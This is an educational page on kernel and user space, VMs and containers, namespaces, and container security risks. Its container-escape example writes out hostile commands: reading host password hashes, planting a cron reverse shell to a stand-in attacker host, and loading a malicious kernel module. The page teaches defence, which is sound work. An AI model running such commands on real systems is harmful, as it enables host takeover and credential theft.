Kernel Space and User Space in Virtualization and Containers

Audience: Developers with basic Linux knowledge who want to understand how process isolation really works — from CPU privilege rings down to what happens when a containerized process makes a system call.

Modern operating systems split memory and execution into two distinct domains: kernel space and user space. This boundary is one of the most fundamental concepts in systems programming, and understanding it is essential for reasoning about how virtual machines, containers, and tools like Docker or containerd actually provide (or fail to provide) isolation. This page walks from first principles — CPU rings, context switches, system calls — through to the concrete security implications of sharing a kernel across dozens of containers.


Table of Contents

  1. Definitions
  2. How It Works in a Traditional OS
  3. Virtualization: VMs vs Containers
  4. Containers Deep Dive
  5. Practical Examples
  6. Comparison Table
  7. Further Reading
  8. Summary

1. Definitions

Kernel Space

Kernel space is the region of virtual memory reserved for the operating system kernel and its extensions (drivers, kernel modules). Code running here executes at the highest privilege level and has unrestricted access to:

  • All physical and virtual memory
  • All CPU instructions, including privileged ones (lgdt, in/out, wrmsr, etc.)
  • All hardware devices
  • Every process's address space

The kernel itself — the scheduler, memory manager, VFS layer, network stack, device drivers — all live here.

User Space

User space is everything else: applications, daemons, libraries, language runtimes. User-space processes run in an isolated virtual address space and cannot directly access hardware or kernel memory. Any operation that requires elevated privilege — opening a file, allocating memory, sending a packet — must be requested from the kernel via a system call.
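To make the "requested from the kernel" step concrete, here is a minimal Python sketch. The functions in the `os` module used below are thin wrappers over the corresponding system calls, so each call crosses into the kernel and back. The helper name `roundtrip_through_kernel` is illustrative only and not part of any library.

```python
import os


def roundtrip_through_kernel(payload: bytes) -> bytes:
    """Send bytes through a kernel pipe buffer and read them back.

    Keep the payload small: a write larger than the pipe buffer would block.
    """
    read_fd, write_fd = os.pipe()              # pipe(2): kernel allocates the buffer
    try:
        os.write(write_fd, payload)            # write(2): user memory -> kernel buffer
        return os.read(read_fd, len(payload))  # read(2): kernel buffer -> user memory
    finally:
        os.close(read_fd)                      # close(2)
        os.close(write_fd)
```

Running this under `strace -e trace=pipe2,pipe,read,write,close` should show the individual crossings, although the interpreter itself adds many unrelated syscalls at startup.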

Why the Separation Exists

The separation is a deliberate security and stability boundary:

| Concern | Without separation | With separation |
| --- | --- | --- |
| Stability | A buggy app could corrupt kernel memory | A crashing process is killed; kernel is unaffected |
| Security | Any process could read any other process's memory | Processes are isolated in separate virtual address spaces |
| Integrity | Malicious code could overwrite interrupt handlers | Kernel code is protected from unprivileged writes |

The boundary is enforced by hardware — not just by software convention.


2. How It Works in a Traditional OS

CPU Privilege Rings

x86/x64 CPUs implement four privilege rings (Ring 0–3), though mainstream operating systems use only two:

┌─────────────────────────────────────────┐
│             Ring 0 (Kernel)             │  ← Full hardware access
│  ┌───────────────────────────────────┐  │
│  │          Ring 3 (User)            │  │  ← Restricted, isolated
│  │   Applications & Libraries        │  │
│  └───────────────────────────────────┘  │
└─────────────────────────────────────────┘
  • Ring 0 — the kernel runs here. Can execute any instruction.
  • Ring 3 — user processes run here. Attempting a privileged instruction causes a CPU exception (General Protection Fault), which the kernel handles — usually by killing the offending process.

Rings 1 and 2 were intended for device drivers but are unused on Linux and Windows; drivers run in Ring 0.

System Calls

A system call (syscall) is the controlled gateway from user space into kernel space. The kernel exposes a stable ABI of ~300–400 syscalls on Linux (read, write, open, fork, mmap, socket, etc.).

The flow for a simple read() call:

User Process (Ring 3)
       │  1. Calls read(fd, buf, n) in libc
       │  2. libc sets up registers:
       │     rax = syscall number (0 = sys_read)
       │     rdi = fd, rsi = buf ptr, rdx = n
       │  3. Executes `syscall` instruction
  ────────────── privilege boundary ──────────────
       │  4. CPU switches to Ring 0, saves user state
       │  5. Kernel's syscall handler dispatches to sys_read()
       │  6. Kernel copies data from file into buf
       │  7. Returns to user space (Ring 3), restores state
User Process resumes with return value in rax

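This transition (saving registers, switching privilege levels, executing kernel code, and returning) is a mode switch between privilege domains, often loosely called a context switch. Unlike a full context switch, it does not hand the CPU to a different process. It costs on the order of hundreds of nanoseconds on modern hardware.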
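The register-level flow above can be approximated from Python by skipping the dedicated libc wrapper and calling libc's generic `syscall(3)` entry point with a raw syscall number. This is a sketch under stated assumptions: the numbers in `SYS_GETPID` are the Linux values for x86-64 and aarch64 only, and the function falls back to `os.getpid()` anywhere else.

```python
import ctypes
import os
import platform
import sys

# Assumption: Linux syscall numbers for getpid(2) on two common 64-bit ABIs.
SYS_GETPID = {"x86_64": 39, "aarch64": 172}


def raw_getpid() -> int:
    """Invoke getpid(2) by number through libc's syscall(3) wrapper."""
    number = SYS_GETPID.get(platform.machine())
    is_64bit = ctypes.sizeof(ctypes.c_void_p) == 8
    if number is None or not is_64bit or not sys.platform.startswith("linux"):
        return os.getpid()                      # fallback on unknown platforms
    libc = ctypes.CDLL(None, use_errno=True)    # symbols already loaded in-process
    libc.syscall.restype = ctypes.c_long
    # libc places the number in rax (x86-64) and executes the syscall instruction.
    return libc.syscall(ctypes.c_long(number))
```

The result should match `os.getpid()`, since both paths end in the same kernel handler.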

The Virtual Address Space

Each user-space process has its own virtual address space; on x86-64 Linux with 4-level paging, the user portion spans 128 TiB. The upper portion is reserved for kernel memory and is not accessible from Ring 3. The kernel is therefore always "present" at known virtual addresses, but the hardware enforces that Ring 3 code cannot read or write to it. (Kernels with page-table isolation enabled go further and unmap most kernel pages while user code runs.)

Virtual Address Space of a single process (x86-64, 4-level paging):
┌──────────────────────────────┐  0xFFFF_FFFF_FFFF_FFFF
│         Kernel Space         │  ← mapped but not accessible
│   (same physical pages for   │    from user space (Ring 3)
│    all processes)            │
├──────────────────────────────┤  0xFFFF_8000_0000_0000
│   Non-canonical addresses    │  ← unusable gap
├──────────────────────────────┤  0x0000_7FFF_FFFF_FFFF
│                              │
│         User Space           │  ← fully accessible from Ring 3
│   Stack | Heap | .text | ... │
│                              │
└──────────────────────────────┘  0x0000_0000_0000_0000
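The hardware enforcement can be observed from user space by deliberately touching a kernel-half address. The sketch below does this in a throwaway child process so the parent survives. It assumes x86-64 Linux, where `0xFFFF800000000000` lies in the kernel half; the helper name `probe_kernel_address` is illustrative.

```python
import subprocess
import sys

# Assumption: this address belongs to the kernel half on x86-64 Linux.
CHILD = "import ctypes; ctypes.string_at(0xFFFF800000000000, 1)"


def probe_kernel_address() -> int:
    """Run a child that reads one byte from a kernel address; return its exit status."""
    result = subprocess.run(
        [sys.executable, "-c", CHILD],
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    # A negative value means the child was killed by that signal number.
    return result.returncode
```

On x86-64 Linux the child is typically terminated with SIGSEGV: the CPU raises a page fault, and the kernel converts it into a signal for the offending process only.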

3. Virtualization: VMs vs Containers

The kernel/user-space model becomes much more interesting in virtualized environments because several isolated environments now share one machine. The key question is whether each environment gets its own kernel (virtual machines) or only its own user space (containers).

Virtual Machines (Full Virtualization)

A hypervisor (KVM, VMware ESXi, Hyper-V) sits between the hardware and one or more guest OSes. Each VM runs a complete OS with its own kernel.

┌─────────────────────────────────────────────────────────┐
│                     Host OS / Hypervisor                │
│ ┌──────────────────────────┐ ┌──────────────────────────┐│
│ │         VM 1             │ │         VM 2             ││
│ │  ┌────────────────────┐  │ │  ┌────────────────────┐  ││
│ │  │  Guest User Space  │  │ │  │  Guest User Space  │  ││
│ │  │   (apps, libs)     │  │ │  │   (apps, libs)     │  ││
│ │  ├────────────────────┤  │ │  ├────────────────────┤  ││
│ │  │  Guest Kernel      │  │ │  │  Guest Kernel      │  ││
│ │  │  (isolated)        │  │ │  │  (isolated)        │  ││
│ │  └────────────────────┘  │ │  └────────────────────┘  ││
│ └──────────────────────────┘ └──────────────────────────┘│
│              ↕ Hypervisor (virtualises hardware)         │
│                     Physical Hardware                    │
└─────────────────────────────────────────────────────────┘

Key properties:

  • Full kernel isolation: a kernel bug in VM1 does not affect VM2.
  • Syscalls stay within the guest kernel: they never reach the host kernel directly.
  • Higher overhead: each VM boots a full OS; memory footprint is in the GB range.
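One observable side effect of running on a guest kernel: on x86 Linux guests, the CPU usually advertises a `hypervisor` flag in `/proc/cpuinfo`. The following is a heuristic sketch only; the flag is x86-specific, and a container running on a VM host will see it too. Both function names are illustrative.

```python
from pathlib import Path


def has_hypervisor_flag(cpuinfo_text: str) -> bool:
    """Return True if any 'flags' line in /proc/cpuinfo text lists 'hypervisor'."""
    for line in cpuinfo_text.splitlines():
        key, _, value = line.partition(":")
        if key.strip() == "flags" and "hypervisor" in value.split():
            return True
    return False


def running_under_hypervisor() -> bool:
    """Best-effort check on the current machine; False when /proc is unavailable."""
    path = Path("/proc/cpuinfo")
    return path.exists() and has_hypervisor_flag(path.read_text())
```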

Containers (OS-Level Virtualization)

Containers use Linux kernel features (namespaces and cgroups) to partition a single running kernel into isolated views. There is no guest kernel.

┌─────────────────────────────────────────────────────────┐
│                      Host OS                            │
│ ┌──────────────────────────┐ ┌──────────────────────────┐│
│ │      Container A         │ │      Container B         ││
│ │  ┌────────────────────┐  │ │  ┌────────────────────┐  ││
│ │  │  User Space        │  │ │  │  User Space        │  ││
│ │  │  (nginx, libc,     │  │ │  │  (python, libs,    │  ││
│ │  │   overlay FS)      │  │ │  │   overlay FS)      │  ││
│ │  └────────┬───────────┘  │ │  └────────┬───────────┘  ││
│ └───────────│──────────────┘ └───────────│──────────────┘│
│             └─────────────┬──────────────┘               │
│                    ┌──────▼──────┐                       │
│                    │ Host Kernel │  ← SHARED             │
│                    │  (syscalls, │                       │
│                    │  namespaces,│                       │
│                    │  cgroups)   │                       │
│                    └─────────────┘                       │
│                    Physical Hardware                     │
└─────────────────────────────────────────────────────────┘

Key properties:

  • Shared kernel: all containers call into the same kernel.
  • Lower overhead: containers start in milliseconds; overhead is in the MB range.
  • Weaker isolation: the shared kernel is both the isolation mechanism and the attack surface.


4. Containers Deep Dive

The Linux Primitives: Namespaces and cgroups

Containers are not a single kernel feature — they are a composition of several:

| Feature | What it isolates |
| --- | --- |
| pid namespace | Process ID space; PID 1 in a container is not the host's init |
| net namespace | Network interfaces, routing tables, firewall rules |
| mnt namespace | Mount points and filesystem hierarchy |
| uts namespace | Hostname and NIS domain name |
| ipc namespace | POSIX message queues, shared memory segments |
| user namespace | UID/GID mappings (root in container ≠ root on host, optionally) |
| cgroup namespace | View of cgroup hierarchy |
| cgroups v2 | Resource limits: CPU, memory, I/O, PIDs |

These namespaces give each container a virtualised view of the system, but all system calls still reach the same host kernel.
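The namespaces a process belongs to are visible as symbolic links under `/proc/self/ns`. A minimal sketch that lists them follows; the function name is illustrative, and it returns an empty mapping where `/proc` is not available.

```python
import os

NS_DIR = "/proc/self/ns"


def current_namespaces() -> dict:
    """Map namespace type -> identifier string such as 'pid:[4026531836]'."""
    if not os.path.isdir(NS_DIR):
        return {}                          # not Linux, or /proc is not mounted
    result = {}
    for name in sorted(os.listdir(NS_DIR)):
        try:
            result[name] = os.readlink(os.path.join(NS_DIR, name))
        except OSError:
            continue                       # entry not readable; skip it
    return result
```

Two processes that print the same identifier for a given type share that namespace. Comparing the output on the host with the output inside a container shows which views were split off.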

What Runs in User Space Per Container

Each container has its own isolated user space containing:

  • Root filesystem — typically an OCI image layer stack (e.g., alpine:3.19 + your app layer), mounted via overlayfs. This provides a private /bin, /lib, /etc, etc.
  • Processes — each container has its own PID namespace; the first process is PID 1 inside the container.
  • Libraries (libc, language runtimes, and dependencies) come from the container image, not the host.
  • Environment — its own hostname, network interfaces, and mount tree.
Container A's user space:
/
├── bin/         ← from Alpine base image layer
├── lib/         ← libc from Alpine, NOT the host's libc
├── usr/
│   └── local/
│       └── bin/nginx   ← application layer
├── etc/
│   └── nginx/nginx.conf
├── proc/        ← virtualised via pid + mount namespace
└── sys/         ← virtualised

The kernel itself — at /proc/version, in kernel memory, in system call tables — is the host kernel and is identical for all containers.
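A quick way to observe this is to compare the kernel identity reported inside different containers on one host. The sketch below collects the two values mentioned above; `kernel_identity` is an illustrative name.

```python
import platform


def kernel_identity() -> dict:
    """Collect the kernel release from uname(2) and the text of /proc/version."""
    info = {"uname_release": platform.release()}
    try:
        with open("/proc/version", encoding="utf-8") as handle:
            info["proc_version"] = handle.read().strip()
    except OSError:
        info["proc_version"] = None        # /proc unavailable on this platform
    return info
```

Run in an Alpine-based container and a Debian-based container on the same host, both calls are expected to report the host's release string, regardless of the distribution in the image.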

How containerd Manages This

containerd is the industry-standard container runtime (used by Docker, Kubernetes, and others). Its role in the stack:

┌──────────────────────────────────┐
│  User (CLI / Kubernetes)         │
├──────────────────────────────────┤
│  containerd (container lifecycle │
│  management — image pull,        │
│  snapshot management, task API)  │
├──────────────────────────────────┤
│  runc (OCI runtime)              │
│  → calls clone(2) with CLONE_NEW*│
│    flags to create namespaces    │
│  → sets up cgroups, pivot_root   │
│  → execs container entrypoint    │
├──────────────────────────────────┤
│  Linux Kernel                    │
│  (namespaces, cgroups, overlayfs)│
└──────────────────────────────────┘

runc — the low-level OCI runtime — directly invokes syscalls like clone(2), unshare(2), pivot_root(2), and mount(2) to set up the container environment. It does not involve any virtual machine or hypervisor.
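A heavily reduced sketch of one of these steps follows: a child process calls `unshare(2)` with `CLONE_NEWUSER | CLONE_NEWUTS` and reports its UTS namespace before and after. This is not how runc is implemented; it only illustrates the syscall. Whether the call succeeds depends on host configuration (unprivileged user namespaces may be disabled), and `try_unshare_uts` is an illustrative name.

```python
import subprocess
import sys

# Flag values from <linux/sched.h>.
CLONE_NEWUTS = 0x04000000
CLONE_NEWUSER = 0x10000000

CHILD = f"""
import ctypes, os
libc = ctypes.CDLL(None, use_errno=True)
before = os.readlink("/proc/self/ns/uts")
rc = libc.unshare({CLONE_NEWUSER | CLONE_NEWUTS})
after = os.readlink("/proc/self/ns/uts")
print(rc, before, after)
"""


def try_unshare_uts():
    """Return (rc, uts_before, uts_after) from a child, or None if unsupported."""
    proc = subprocess.run([sys.executable, "-c", CHILD],
                          capture_output=True, text=True)
    if proc.returncode != 0:
        return None                    # no /proc, no unshare(2), or not Linux
    rc, before, after = proc.stdout.split()
    return int(rc), before, after
```

When the call succeeds (`rc == 0`), the namespace identifier changes; when the kernel refuses, it stays the same. Either way, the work happens entirely in the one running kernel.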

Isolation and Security Implications

Because every container shares the host kernel:

  1. There is no kernel isolation. A vulnerability in the kernel is exploitable by any container.
  2. Namespace escapes are possible. Misconfigured namespaces (e.g., a container with access to the host's pid namespace) break isolation entirely.
  3. Privileged containers are dangerous. Running a container with --privileged or excessive capabilities grants near-root access to the host.
  4. The syscall surface is the attack surface. Every syscall reachable from a container is a potential exploit path into the shared kernel.

Mitigation tools (seccomp, AppArmor/SELinux, user namespaces) reduce this surface but do not eliminate it.


5. Practical Examples

5.1 Architecture Diagram (Mermaid)

graph TD
    subgraph Host["Host Machine"]
        subgraph ContainerA["Container A (nginx)"]
            A_proc["PID 1: nginx\n(user space)"]
            A_fs["overlayfs root\n/bin, /lib, /etc/nginx"]
            A_net["veth0\n172.17.0.2/16"]
        end

        subgraph ContainerB["Container B (python app)"]
            B_proc["PID 1: python\n(user space)"]
            B_fs["overlayfs root\n/bin, /lib, /app"]
            B_net["veth1\n172.17.0.3/16"]
        end

        subgraph Kernel["Host Kernel (shared)"]
            NS["Namespaces\n(pid, net, mnt, uts, ipc)"]
            CG["cgroups v2\n(CPU, memory limits)"]
            SC["Syscall Table\nsys_read, sys_write, sys_socket…"]
            NET["Network Stack\niptables / nftables"]
            FS["VFS / overlayfs"]
        end

        A_proc -->|"syscall (e.g. read, write, socket)"| SC
        B_proc -->|"syscall (e.g. read, write, socket)"| SC
        SC --> NS
        SC --> CG
        SC --> NET
        SC --> FS
    end

5.2 A System Call from Inside a Container

Consider a Python process inside Container B calling socket.connect(). Here is the full path from container user space to the shared kernel:

Python (user space, inside container):

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("93.184.216.34", 80))  # example.com

What happens at the kernel boundary:

// CPython's socket.connect() calls libc's connect(), which issues the connect(2) syscall:
// rax = 42  (SYS_connect on x86-64)
// rdi = sockfd
// rsi = &sockaddr  { AF_INET, port=80, ip=93.184.216.34 }
// rdx = sizeof(struct sockaddr_in)
// → syscall instruction

// Inside the HOST kernel (simplified pseudocode of the connect(2) path):
long sys_connect(int fd, struct sockaddr __user *uservaddr, int addrlen) {
    struct socket *sock = sockfd_lookup_light(fd, ...);
    // sock->ops->connect() calls into the TCP/IP stack.
    // The socket belongs to Container B's network namespace, so routing
    // uses that namespace's tables, but the code is the host kernel's.
    // Packets leave through the container's veth pair and the docker0 bridge.
}

Key observation: the connect(2) syscall executes in the host kernel's network stack. The container's net namespace gives it an isolated view (its own routing table, its own eth0), but the code executing is the host kernel's TCP implementation — the same code serving Container A and the host itself.
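For experimenting without external network access, the same kernel path can be exercised over loopback. The sketch below is self-contained and can be run under `strace -e trace=network` inside and outside a container to compare; `loopback_connect` is an illustrative helper, not part of the original example.

```python
import socket


def loopback_connect(message: bytes = b"ping") -> bytes:
    """Open a listener on 127.0.0.1, connect to it, and pass one short message."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.bind(("127.0.0.1", 0))      # port 0: the kernel picks a free port
        server.listen(1)
        port = server.getsockname()[1]
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
            # connect(2): the kernel completes the TCP handshake on its own,
            # before user space has called accept().
            client.connect(("127.0.0.1", port))
            conn, _ = server.accept()
            with conn:
                client.sendall(message)    # data is copied into kernel socket buffers
                return conn.recv(len(message))
```

Inside a container, the loopback interface used here belongs to the container's own net namespace, yet the TCP code that runs is still the host kernel's.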

5.3 Security Implication: Kernel Exploit Affects All Containers

Scenario: Dirty Pipe (CVE-2022-0847)

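Dirty Pipe is a vulnerability in the Linux kernel's pipe subsystem that was publicly disclosed in March 2022. It affects kernels from 5.8 onward and was fixed upstream in 5.16.11, 5.15.25, and 5.10.102. It allowed an unprivileged local user to overwrite the page-cache contents of any file they could open for reading, including read-only files and SUID binaries.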

# Inside Container A (running as non-root UID 1000)
# The attacker has no special privileges inside the container.

# 1. The exploit targets a file it can only read, such as /usr/bin/su in the
#    container's overlayfs, and the kernel bug lets it write into that
#    file's page-cache pages anyway.

# 2. The page cache belongs to the single shared kernel, so the modified
#    pages are seen by every container (and the host) that reads the same
#    underlying file, for example a shared image layer or a host file
#    mounted read-only into the container.

# 3. Result: root inside the container and, where a host-owned file is
#    reachable, a path to privilege escalation ON THE HOST,
#    breaking out of Container A entirely.

Why this is different from a VM scenario:

In a VM, the guest kernel's pipe subsystem is isolated. CVE-2022-0847 in the guest kernel would give root inside the VM, but the hypervisor boundary would stop the exploit from reaching the host or other VMs. In a container environment, there is no such boundary — every container on the host was vulnerable until the host kernel was patched.
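Because the exposure depends on the host kernel alone, a first triage step is to check its release. The sketch below is a heuristic only: it assumes upstream-style version strings, with the bug introduced in 5.8 and fixed in 5.10.102, 5.15.25, and 5.16.11. Distribution kernels often backport fixes without changing these numbers, so a positive result means "check the vendor advisory", not "vulnerable". The function name is illustrative.

```python
import re

# Upstream stable releases that first contained the CVE-2022-0847 fix.
FIXED_IN = {(5, 10): 102, (5, 15): 25, (5, 16): 11}


def looks_affected_by_dirty_pipe(release: str) -> bool:
    """Heuristic check of an upstream-style release string such as '5.15.24'."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not match:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch = (int(group or 0) for group in match.groups())
    if (major, minor) < (5, 8) or (major, minor) >= (5, 17):
        return False                   # predates the bug, or branched after the fix
    fixed_patch = FIXED_IN.get((major, minor))
    if fixed_patch is None:
        return True                    # assumption: other 5.8-5.14 branches never got the fix
    return patch < fixed_patch
```

It can be fed `platform.release()` on the host. Running it inside a container gives the same answer, which is the point of this section.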

Mitigation layers (none are complete substitutes for patching):

# Example: seccomp allow-list profile in the style of Docker's default
# profile (abbreviated excerpt).
# Note: splice(2), the syscall central to Dirty Pipe, is allowed by
# Docker's default profile, illustrating the difficulty of blocking
# syscalls without breaking legitimate workloads.
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "syscalls": [
    {
      "names": ["read", "write", "open", "close", "mmap", ...],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}
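Whether a seccomp filter is active for a process can be read from the `Seccomp:` field of `/proc/<pid>/status` (0 = disabled, 1 = strict, 2 = filter). A small sketch for checking this from inside a container follows; the function names are illustrative.

```python
SECCOMP_MODES = {0: "disabled", 1: "strict", 2: "filter"}


def seccomp_mode(status_text: str):
    """Return the seccomp mode name parsed from /proc/<pid>/status text, or None."""
    for line in status_text.splitlines():
        if line.startswith("Seccomp:"):
            return SECCOMP_MODES.get(int(line.split(":", 1)[1]), "unknown")
    return None


def own_seccomp_mode():
    """Seccomp mode of the current process; None where /proc is unavailable."""
    try:
        with open("/proc/self/status", encoding="utf-8") as handle:
            return seccomp_mode(handle.read())
    except OSError:
        return None
```

A process started under a runtime's default profile would be expected to report "filter". This only shows that a filter is installed, not which syscalls it blocks.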

5.4 Container Escape via Privileged Mode

Running a container with --privileged leaves the namespaces in place but removes nearly all of the restrictions that make them an effective boundary:

# On the host, a developer runs a "debug" container carelessly:
docker run --privileged -it ubuntu bash

# Inside the container, an attacker can:

# 1. Mount the host filesystem
mkdir /host
mount /dev/sda1 /host     # /dev/sda1 is visible because --privileged
                           # grants access to ALL host devices

# 2. Read and modify host files
cat /host/etc/shadow      # host password hashes
echo "* * * * * root bash -i >& /dev/tcp/attacker/4444 0>&1" \
  >> /host/etc/crontab    # plant a reverse shell

# 3. Load a kernel module (full kernel compromise)
insmod /malicious.ko      # arbitrary kernel code execution on the HOST

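This escape works because --privileged grants every capability (including CAP_SYS_ADMIN and CAP_SYS_MODULE), exposes the host's device nodes, and disables the default seccomp and AppArmor profiles, effectively giving the container access to the host kernel's full interface.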
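A process can check which capabilities it actually holds by decoding the `CapEff` bitmask in `/proc/self/status`. The sketch below uses the bit positions from `<linux/capability.h>`. The two sample masks in the usage note are illustrative assumptions: one corresponds to Docker's usual default capability set, the other to a mask with the low 41 bits set.

```python
# Bit positions from <linux/capability.h>.
CAP_SYS_MODULE = 16
CAP_SYS_ADMIN = 21


def effective_caps(status_text: str) -> int:
    """Parse the CapEff bitmask (hexadecimal) from /proc/<pid>/status text."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split(":", 1)[1].strip(), 16)
    raise ValueError("no CapEff line found")


def has_cap(mask: int, cap_bit: int) -> bool:
    """True if the capability with the given bit number is set in the mask."""
    return bool(mask >> cap_bit & 1)
```

For example, `has_cap(effective_caps("CapEff:\t00000000a80425fb"), CAP_SYS_ADMIN)` is False, while the same check against `000001ffffffffff` is True. Seeing CAP_SYS_ADMIN or CAP_SYS_MODULE set inside a container is a strong hint that it is running privileged.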


6. Comparison Table

| Dimension | Bare Metal | Virtual Machine | Container |
| --- | --- | --- | --- |
| Kernel | Host kernel only | Separate guest kernel per VM | Shared host kernel |
| Isolation level | None (single OS) | Strong (hypervisor boundary) | Moderate (namespace boundary) |
| Kernel sharing | N/A | No; each VM has its own | Yes; all containers on the host |
| Attack surface | Full host | Guest kernel + hypervisor API | Host kernel syscall interface |
| A kernel CVE affects… | The host | Only VMs running that kernel version | All containers on the host |
| Startup time | N/A | Seconds to minutes | Milliseconds |
| Memory overhead | None | ~512 MB – several GB per VM | ~10–50 MB per container |
| Filesystem isolation | None | Full (virtual disk) | overlayfs per container |
| Network isolation | None | Virtual NIC per VM | net namespace per container |
| Syscall path | Direct to kernel | Guest kernel; privileged operations trap to the hypervisor (VM exit) | Direct to host kernel (scoped by namespaces, optionally filtered by seccomp) |
| Root in environment = root on host? | Yes | No (root in guest ≠ host root) | Potentially yes (without user namespaces) |
| Use case | Max performance, single tenant | Strong multi-tenant isolation | High-density, microservices, CI |
| Examples | Physical server | KVM, VMware ESXi, Hyper-V | Docker, containerd/runc, LXC, Podman |

7. Further Reading

Tools

  • strace — trace syscalls made by a process (works inside containers)
  • nsenter — enter the namespaces of a running container
  • unshare — create new namespaces from the shell
  • Falco — runtime security; detects anomalous syscall behaviour in containers

8. Summary

The kernel/user-space boundary is a hardware-enforced privilege separation that underpins all OS security and stability. System calls are the only legal crossing point, governed by CPU rings and a controlled kernel ABI.

Virtual machines extend this model by running complete guest kernels inside a hypervisor, giving each VM its own isolated kernel. This means a kernel-level exploit in one VM stays within that VM.

Containers take a fundamentally different approach: they use Linux namespaces to create isolated views of a single running kernel, and cgroups to enforce resource limits. The kernel itself is shared. This makes containers fast and lightweight, but it means:

  • The kernel is the trust boundary — and it is shared by every container on the host.
  • A kernel vulnerability is a host-wide vulnerability — not scoped to a single container.
  • User space is fully isolated per container (filesystem, processes, network interfaces), but kernel space is not.

For most workloads, the container isolation model is acceptable when combined with defence-in-depth (seccomp profiles, AppArmor/SELinux policies, non-root users, minimal capabilities, image provenance). For high-security multi-tenant environments, consider gVisor (a user-space kernel that intercepts syscalls) or Kata Containers (lightweight VMs with their own guest kernel) to place a stronger boundary in front of the host kernel without sacrificing the container developer experience.


Page last updated: 2025. Kernel behaviour described targets Linux 5.15+ / 6.x LTS unless otherwise noted.